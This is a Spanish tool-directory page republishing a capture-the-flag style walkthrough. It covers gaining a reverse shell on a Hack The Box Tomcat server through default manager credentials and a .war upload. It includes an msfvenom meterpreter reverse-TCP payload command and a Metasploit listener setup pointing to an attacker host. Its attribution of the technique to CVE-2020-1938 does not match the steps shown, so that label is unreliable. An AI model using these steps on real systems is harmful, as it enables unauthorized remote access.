Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-1938-Exploitation — Guía paso a paso para la explotación de CVE-2020-1938 (carga arbitraria de JSP a RCE en Apache Tomcat) utilizando msfvenom y Metasploit en un entorno de laboratorio Hack The Box. | Kitploit
Herramientas/GitHubGitHub/hopsypopsy8/cve-2020-1938-exploitation
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubhopsypopsy8/cve-2020-1938-exploitation

CVE-2020-1938-Exploitation

Guía paso a paso para la explotación de CVE-2020-1938 (carga arbitraria de JSP a RCE en Apache Tomcat) utilizando msfvenom y Metasploit en un entorno de laboratorio Hack The Box.

Ver Repositorio
3hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Explotación de CVE-2020-1938

Subida arbitraria de JSP en Apache Tomcat que conduce a RCE

Descripción

CVE-2020-1938 es una vulnerabilidad crítica que afecta a Apache Tomcat desde 9.0.0.M1 hasta 9.0.0.30, 8.5.0 hasta 8.5.50 y 7.0.0 hasta 7.0.99 ⚠️ Esto fue explotado en un laboratorio de Hack The Box.

🔗 Referencia: Entrada NIST NVD

Reconocimiento

Identificando un Vector de Ataque

image
  1. El sitio web tiene credenciales predeterminadas para la función Server Status.

  2. Esta interfaz indica que la versión es Apache Tomcat/7.0.88, arquitectura de 64 bits.

  3. Desde esta interfaz navegamos hasta listar aplicaciones, lo que expone una función de Subida de archivos .war.

  • En una subida exitosa, el archivo .war se ejecuta en /directorio/nombrearchivo

  • La investigación sobre la versión de Apache Tomcat confirmó la vulnerabilidad a CVE-2020-1938

  • Explotación

  • Generando archivo .war

    root@kitploit:~
    msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.3 LPORT=3004 -f war -o exploit.war
    

    Usando msfvenom, que es un generador de cargas útiles de metasploit, generamos nuestra carga útil exploit.war.

    1. -p windows/x64/meterpreter_reverse_tcp es el tipo de carga útil (en nuestro caso de 64 bits, como se identificó en Server Status)
    2. LHOST=10.10.14.3 LPORT=3004 son los detalles de conexión inversa para la máquina del atacante
    3. -f war es el tipo de archivo
    4. -o exploit.war nombre del archivo de salida

    Después de la generación del archivo, ingrese al archivo y encuentre el nombre del archivo .jsp, p. ej., gcvxdtmxvw.jsp, y guárdelo para más adelante.

    Configurando metasploit

    root@kitploit:~
    msfconsole
    use exploit/multi/handler
    Set LHOST 10.10.14.3
    Set LPORT 3004
    

    Usando msfconsole configuramos un listener que espera a que se ejecute nuestra carga útil.

    Subiendo y ejecutando el archivo malicioso

    image
    image

    Subimos nuestra imagen en la sección de despliegue (deploy), después de lo cual actualizamos la pantalla y encontramos que el archivo se ha subido exitosamente. Para finalizar la explotación debemos navegar a la ruta ip/hacked/gcvxdtmxvw.jsp.

    image

    Esto cuelga la solicitud, sin embargo podemos ver localmente en nuestra máquina que tenemos una conexión inversa.

    Descargar herramienta